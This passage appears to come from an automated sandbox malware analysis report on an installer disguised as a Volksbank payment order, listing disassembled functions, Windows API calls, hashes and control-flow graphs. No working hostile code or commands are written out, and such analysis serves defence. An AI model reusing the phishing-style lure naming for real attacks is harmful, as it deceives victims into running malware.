                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8966ce359cce6a56e5f40edb4934bcd43778f88519524c0e205861d602d95146
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81314979D0521CDFEB10DFA4D9897CDBBB8AF08344F1044AAE50CAB250EB709A868F44
                                                                                                                                                                                                                                          Function 34F42264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 34F42276
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 34F42285
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 34F4228E
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 34F4229B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 9abd86ed81c816cbd6c9b21c270a3cf8fa8880445c30883121caa87c95cd8546
                                                                                                                                                                                                                                          • Instruction ID: 66443701e3b506d46df98f476a3657fa2c28c6b1adbcea3494824c1e8c3e96ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9abd86ed81c816cbd6c9b21c270a3cf8fa8880445c30883121caa87c95cd8546
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78F0AF70C10208EBCB00DBB4D549A9EBBF8FF18305F5244959402F7200EB34AB068B94
                                                                                                                                                                                                                                          Function 34F42B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B21
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(34F4D1DC,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B2A
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B35
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B3C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                                                          • Opcode ID: 787f31f03408b9559bb8b3dc22d2a667ec37cc466010b3d274e840a9e7b51286
                                                                                                                                                                                                                                          • Instruction ID: 8c6dde3cf80e33b6ad5b742034939fabad6b4a8b47cbbddd92b3704e340a33bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 787f31f03408b9559bb8b3dc22d2a667ec37cc466010b3d274e840a9e7b51286
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1ED01231004208ABD7002FE8FD0CA593F28EF14212F0A0000F709A3344CF318403CBD9
                                                                                                                                                                                                                                          Function 34F46580 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: .$h#9/
                                                                                                                                                                                                                                          • API String ID: 0-1189678462
                                                                                                                                                                                                                                          • Opcode ID: 8c84bab4a0bab4096dd0093da35ba8f3f053420ec9647574fd0e776becd36792
                                                                                                                                                                                                                                          • Instruction ID: 4b96159a1fa1ea6917860e1b59d820ae023e38029e961bb15502301ed209e170
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c84bab4a0bab4096dd0093da35ba8f3f053420ec9647574fd0e776becd36792
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84310775900209AFFB148E78CC84EEA7FBDDF45354F0849ACE518D7361EE349A468B50
                                                                                                                                                                                                                                          Function 34F44AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082,34F52108,?,34F41F3A,?), ref: 34F44AD5
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082,34F52108,?,34F41F3A,?), ref: 34F44ADC
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 34F44AEE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 0be41d67ad80ce556853d973a076a4ef84a70787489ac16cfa7e32a07287eb3d
                                                                                                                                                                                                                                          • Instruction ID: 3017e7e8dd2cf3b5cb7d3d6fee0d5cd058c5b8a699d9476334e5b038ce45da7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be41d67ad80ce556853d973a076a4ef84a70787489ac16cfa7e32a07287eb3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0B636000608EFDF016F68ED08A497F69FF50385B594814F905AB765DF39DD43CA98
                                                                                                                                                                                                                                          Function 34F4B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,34F4B5BC,?,?,?,?,?,34F4B25C,00000000), ref: 34F4B7EE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                          • Opcode ID: 79de7150018ad77b78578e178c69f89fb8040821852fe4eb1fc1ba1e246d2b4d
                                                                                                                                                                                                                                          • Instruction ID: 089d9f13380dae2a7e905950d8b0e02b2fd4bdb980e6f2e44b1c672155660fb5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79de7150018ad77b78578e178c69f89fb8040821852fe4eb1fc1ba1e246d2b4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1B128766106098FE705CF28C486B547FA0FF45365F698A9CE899CF3A2CB35D992CB40
                                                                                                                                                                                                                                          Function 34F42933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 34F4294C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                          • Opcode ID: 7002a8774baf9477f5a7ad9d7ca5b7c934798456a710e04070bd4f706412a663
                                                                                                                                                                                                                                          • Instruction ID: 4e1c1018584ef545ac6e4b06c8cde19c833f9b5e1f0feb759e9046a59768dce3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7002a8774baf9477f5a7ad9d7ca5b7c934798456a710e04070bd4f706412a663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D44191B29012058BEB15CF59D98169EBBF8FB48394F1D896AD805F7384D770DA42CBA0
                                                                                                                                                                                                                                          Function 34F4724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: cb329d800b82afbd4527145045713855adbd5824f700f281201a1cffc4f7ebdb
                                                                                                                                                                                                                                          • Instruction ID: ac5e50bb17baa27bb723e050f2564c769dd5e38f1593a08629e72176117689fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb329d800b82afbd4527145045713855adbd5824f700f281201a1cffc4f7ebdb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BA011302002028F83088E38A20A20C3AECEA0228030A00A8A808E220CFB2080028A88
                                                                                                                                                                                                                                          Function 00403350 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 82stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorModeVersionlstrlen
                                                                                                                                                                                                                                          • String ID: NSIS Error$UXTHEME
                                                                                                                                                                                                                                          • API String ID: 758611499-110662866
                                                                                                                                                                                                                                          • Opcode ID: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
                                                                                                                                                                                                                                          • Instruction ID: 2ca4496f1a14d18b161ef3d64c4edf84b84b785272aa1eaa0a4cb80950281d6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D621D370500700AFD7107F71AE49B1B3AA8AF40705F40443EFA82B62E2EF7C49458B6E
                                                                                                                                                                                                                                          Function 34F4AA53 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 165 34f4aa53-34f4aa6e 166 34f4aa80 165->166 167 34f4aa70-34f4aa7e RtlDecodePointer 165->167 168 34f4aa85-34f4aa8b 166->168 167->168 169 34f4aa91 168->169 170 34f4abb2-34f4abb5 168->170 171 34f4aba6 169->171 172 34f4aa97-34f4aa9a 169->172 173 34f4abb7-34f4abba 170->173 174 34f4ac12 170->174 180 34f4aba8-34f4abad 171->180 175 34f4ab47-34f4ab4a 172->175 176 34f4aaa0 172->176 178 34f4ac06 173->178 179 34f4abbc-34f4abbf 173->179 177 34f4ac19 174->177 187 34f4ab4c-34f4ab4f 175->187 188 34f4ab9d-34f4aba4 175->188 182 34f4ab34-34f4ab42 176->182 183 34f4aaa6-34f4aaab 176->183 184 34f4ac20-34f4ac49 177->184 178->174 185 34f4abc1-34f4abc4 179->185 186 34f4abfa 179->186 181 34f4ac5b-34f4ac6a call 34f42ada 180->181 182->184 189 34f4ab25-34f4ab2f 183->189 190 34f4aaad-34f4aab0 183->190 212 34f4ac56-34f4ac59 184->212 213 34f4ac4b-34f4ac50 call 34f46368 184->213 191 34f4abc6-34f4abc9 185->191 192 34f4abee 185->192 186->178 193 34f4ab94-34f4ab9b 187->193 194 34f4ab51-34f4ab54 187->194 196 34f4ab61-34f4ab8f 188->196 189->184 197 34f4aab2-34f4aab5 190->197 198 34f4ab1c-34f4ab23 190->198 200 34f4abe2 191->200 201 34f4abcb-34f4abd0 191->201 192->186 193->177 194->181 202 34f4ab5a 194->202 196->212 205 34f4aab7-34f4aaba 197->205 206 34f4ab0d-34f4ab17 197->206 204 34f4aac7-34f4aaf7 198->204 200->192 207 34f4abd2-34f4abd5 201->207 208 34f4abdb-34f4abe0 201->208 202->196 204->212 219 34f4aafd-34f4ab08 call 34f46368 204->219 205->181 210 34f4aac0 205->210 206->184 207->181 207->208 208->180 210->204 212->181 213->212 219->212
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt$h#9/
                                                                                                                                                                                                                                          • API String ID: 3527080286-635473644
                                                                                                                                                                                                                                          • Opcode ID: 995b8fa76e8879ba2b6ee86e1ec2d896e2e69dff60c360d5c8767d8e4120a38a
                                                                                                                                                                                                                                          • Instruction ID: 840a12054744d806b862402e4d2bfc9f1baa5dbb18c884b6ac86a54fda141303
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 995b8fa76e8879ba2b6ee86e1ec2d896e2e69dff60c360d5c8767d8e4120a38a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9518EB5E00609CBEB01AFA4EA4519C7FB8FF49210F594A89D480A6364CF75DA26CB19
                                                                                                                                                                                                                                          Function 34F41CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D1B
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 34F41D37
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D4B
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D58
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D72
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D7D
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                                                                          • Opcode ID: beecedb6f9eafaf375f294aa3f6d19722950b575def379939408ad8068abc718
                                                                                                                                                                                                                                          • Instruction ID: d685d0b9fbdb12bc73af459987c261ee232e4da5d96f7fecf38b77abfa2a1fad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: beecedb6f9eafaf375f294aa3f6d19722950b575def379939408ad8068abc718
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2171B190121CAFE7109BA4ED8CEEA7BBCEF18344F090965F501E3240DE749E478AB4
                                                                                                                                                                                                                                          Function 34F49492 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 310 34f49492-34f494ef GetConsoleCP 311 34f494f5-34f49511 310->311 312 34f49632-34f49644 call 34f42ada 310->312 313 34f49513-34f4952a 311->313 314 34f4952c-34f4953d call 34f47c19 311->314 317 34f49566-34f49575 call 34f479e6 313->317 322 34f49563-34f49565 314->322 323 34f4953f-34f49542 314->323 317->312 324 34f4957b-34f4959b WideCharToMultiByte 317->324 322->317 325 34f49548-34f4955a call 34f479e6 323->325 326 34f49609-34f49628 323->326 324->312 327 34f495a1-34f495b7 WriteFile 324->327 325->312 333 34f49560-34f49561 325->333 326->312 329 34f495b9-34f495ca 327->329 330 34f4962a-34f49630 GetLastError 327->330 329->312 332 34f495cc-34f495d0 329->332 330->312 334 34f495d2-34f495f0 WriteFile 332->334 335 34f495fe-34f49601 332->335 333->324 334->330 336 34f495f2-34f495f6 334->336 335->311 337 34f49607 335->337 336->312 338 34f495f8-34f495fb 336->338 337->312 338->335
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,34F49C07,?,00000000,?,00000000,00000000), ref: 34F494D4
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 34F49590
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,34F49C07,00000000,?,?,?,?,?,?,?,?,?,34F49C07,?), ref: 34F495AF
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,34F49C07,00000000,?,?,?,?,?,?,?,?,?,34F49C07,?), ref: 34F495E8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 977765425-176419635
                                                                                                                                                                                                                                          • Opcode ID: 433d8b431e0ae08a2ad17321ca601d8de36d55b7eff1cc16ee60cc9f935e18be
                                                                                                                                                                                                                                          • Instruction ID: 022982ca8ad05a219c3c732688733c39df32bc8908a17021e3bfc526fc2a8314
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 433d8b431e0ae08a2ad17321ca601d8de36d55b7eff1cc16ee60cc9f935e18be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE5182B5A042059FDB10CFA8D895E9EBBF8EF09300F18455AE555E7385EA309942CF60
                                                                                                                                                                                                                                          Function 34F439BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 339 34f439be-34f439c8 340 34f43a6e-34f43a71 339->340 341 34f43a77 340->341 342 34f439cd-34f439dd 340->342 345 34f43a79-34f43a7d 341->345 343 34f439df-34f439e2 342->343 344 34f439ea-34f43a03 LoadLibraryExW 342->344 346 34f439e8 343->346 347 34f43a6b 343->347 348 34f43a55-34f43a5e 344->348 349 34f43a05-34f43a0e GetLastError 344->349 350 34f43a67-34f43a69 346->350 347->340 348->350 351 34f43a60-34f43a61 FreeLibrary 348->351 352 34f43a45 349->352 353 34f43a10-34f43a22 call 34f455f6 349->353 350->347 354 34f43a7e-34f43a80 350->354 351->350 356 34f43a47-34f43a49 352->356 353->352 359 34f43a24-34f43a36 call 34f455f6 353->359 354->345 356->348 358 34f43a4b-34f43a53 356->358 358->347 359->352 362 34f43a38-34f43a43 LoadLibraryExW 359->362 362->356
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                                                                          • Opcode ID: 8f2885e79622582015909112e0c8df762ca8dd148c0e0506cdf4fd5f64118074
                                                                                                                                                                                                                                          • Instruction ID: adf688e1c7e2502e9a5bb23a15cba2192112791187ac92aef005e77379f18a7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f2885e79622582015909112e0c8df762ca8dd148c0e0506cdf4fd5f64118074
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511967BB41321ABE7119A68DC84A1A3F589F11BA0F9D0914E955A73C0EF30D903CAD2
                                                                                                                                                                                                                                          Function 34F44B39 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 363 34f44b39-34f44b61 GetModuleHandleExW 364 34f44b86-34f44b8a 363->364 365 34f44b63-34f44b76 GetProcAddress 363->365 368 34f44b95-34f44ba2 call 34f42ada 364->368 369 34f44b8c-34f44b8f FreeLibrary 364->369 366 34f44b85 365->366 367 34f44b78-34f44b83 365->367 366->364 367->366 369->368
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,34F44AEA,?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000), ref: 34F44B59
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 34F44B6C
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,34F44AEA,?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082), ref: 34F44B8F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
